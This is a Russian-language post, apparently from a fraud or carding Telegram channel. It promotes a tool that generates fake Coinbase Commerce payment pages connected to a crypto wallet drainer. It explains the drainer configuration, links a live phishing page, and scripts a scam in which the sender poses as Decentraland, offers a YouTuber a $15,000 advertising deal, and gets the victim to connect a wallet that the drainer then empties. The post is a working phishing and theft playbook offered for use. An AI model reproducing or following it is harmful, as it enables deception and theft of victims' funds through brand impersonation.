Пример работы с Drainer
Coinbase Generator (первая версия)
Инструмент, для создания платежных страниц (чеков) похожих на платежные страницы от Coinbase Commerce, где люди обычно оплачивают криптоинвойсы. Мы будем их принимать
Воспроизвел дизайн в стиле Coinbase Commerce.
https://cosmo.layerweb3.online - на момент публикации ссылка рабочая. Прикручены мои конфиги дрейнера, не коннектите ваш кошелек
Все должно быть интуитивно понятно, но все же
Нас интересует только две настройки, к которым могут возникнуть вопросы
Есть возможность загрузить несколько скомпилированных конфигов, которые вы создали в панели дрейнера
Сейчас в этом инпуте две опции Drain и Seed, которые соответствую обычному и сид дрейнерам (модалки 20 и 21) соответственно
Если вы используете кастомный класс для кнопок в панели дрейнера, то его с легкостью можно интегрировать в сгенерированную страницу
Дефолтное значение из панели дрейнера соответствует дефолтному значению настройки (interact-button)
Sender Name - контора, от лица которой мы будем генерировать чек
Icon - вериф иконка, добавил три вида. При наведении выскакивает тултип с надписью "Verified by Coinbase"
Wallet Address - адрес нашей жертвы, полученный в ходе общения
Title - услуга, которую мы будем покупать
Date - подтягивается сегодняшняя дата
Order ID - рандомные символы, которые пригодятся в создании уникальной ссылки
Все инпуты интерактивные - видны в генерируемом превью
В config.js можно добавить, удалить или изменить все значения
Не забудьте изменить пути для ваших скриптов из панели дрейнера!
Кейсы очень простые и как это использовать зависит только от вашего опыта и навыков соц. инженерии
Шаг 1: Установка зрительного контакта
X выбирает ютубера, например, с каналом про игры или крипту, у которого 50-100 тысяч подписчиков. Он пишет письмо с профессиональным тоном:
"Привет, [имя ютубера]! Меня зовут Алексей, я представляю команду [реальный проект, например, Decentraland]. Мы давно следим за твоим каналом, и нам очень нравится, как ты рассказываешь про метавселенные и NFT. У нас сейчас идет большая кампания по продвижению нашей платформы — мы добавили новые виртуальные земли и хотим привлечь больше игроков. Решили предложить тебе сотрудничество: реклама на твоем канале за $15,000 в USDT. Что скажешь?"
Тут он упоминает Decentraland — настоящий проект, чтобы звучать правдоподобно. Ютубер, скорее всего, слышал о нем (это популярная метавселенная на блокчейне Ethereum), и это сразу вызывает доверие. Х может даже добавить деталей: "Мы недавно запустили обновление с новыми аватарами, и твоя аудитория — идеальный таргет для нас". Он не торопится, ждет ответа, а если ютубер заинтересовался, продолжает общение: "Классно, что ты в деле! Давай обсудим детали — какой формат рекламы тебе удобен? Мы обычно делаем 30-секундные вставки или интеграции в видео."
Шаг 2: Упоминание "политики" и переход к Coinbase
Когда ютубер соглашается, Х плавно переходит к оплате. Он пишет:
"Отлично, договорились на интеграцию в следующем видео! Теперь про оплату: у нас в Decentraland есть внутренняя политика — мы не можем отправлять прямые платежи на личные кошельки из-за правил нашей финансовой системы и аудита. Это связано с тем, что все транзакции проходят через наш корпоративный кошелек, и мы используем Coinbase Commerce для выплат партнерам. Это удобно и безопасно, плюс все официально фиксируется. Мы уже подготовили платеж на $15,000 в USDT через Coinbase — тебе просто нужно подтвердить получение по ссылке. Вот она: [фейковая ссылка от Coinbase Generator]. Можешь проверить, там все детали: сумма, сеть Ethereum, и твой кошелек, если захочешь указать другой скажи нам и мы переделаем чек"
Тут он придумывает правдоподобную причину ("политика компании"), чтобы не отправлять деньги напрямую, и делает акцент на "официальности" через Coinbase — бренд, которому многие доверяют.
Он может даже добавить: "Мы так платим всем нашим партнерам, от блогеров до разработчиков, это стандартная процедура." Ютубер, видя знакомое название Coinbase и сумму в $15,000, скорее всего, не заподозрит подвоха, особенно если не привык разбираться в тонкостях крипто-платежей.
Шаг 3: Убедительная страница с дрейнером
Ютубер переходит по ссылке и видит страницу, созданную через твой генератор. Она выглядит достойно: логотип Coinbase, заголовок "Coinbase Commerce", в разделе "From" написано "Decentraland Team" с иконкой верификации, сумма $15,000 в USDT, сеть Ethereum, статус "Complete". Внизу — кнопка "Receive payment" с классом, который Х настроил, чтобы она выглядела солидно. Х заранее указал в настройках свой кошелек и выбрал стратегию "Drain", где подключен крипто-дрейнер. Он может написать ютуберу: "Просто нажми кнопку и подключи кошелек, чтобы забрать деньги. Если что-то непонятно, пиши, я помогу!"
Когда ютубер нажимает кнопку, кошелек (например, MetaMask) запрашивает подключение — это кажется нормальным, ведь многие крипто-сервисы так работают. Но дрейнер в этот момент подсовывает скрытую транзакцию: например, одобрение смарт-контракта, который дает мошеннику доступ ко всем USDT или даже другим токенам на кошельке. Ютубер подтверждает, думая, что получает деньги, а на деле теряет все, что там было. Страница может даже показать фейковое сообщение "Платеж успешно получен!", чтобы он не заподозрил ничего сразу.
Исходник прикреплен к сообщению.
В этой версии ссылки сохраняются в localStorage, то есть недоступны для шаринга. Можете использовать параметры при генерации, но лучше прикрутить бек
Все наши проекты - https://t.me/zloycardinglinks
Наш основной канал - https://t.me/+Q1hvYMCV_lA3NjU5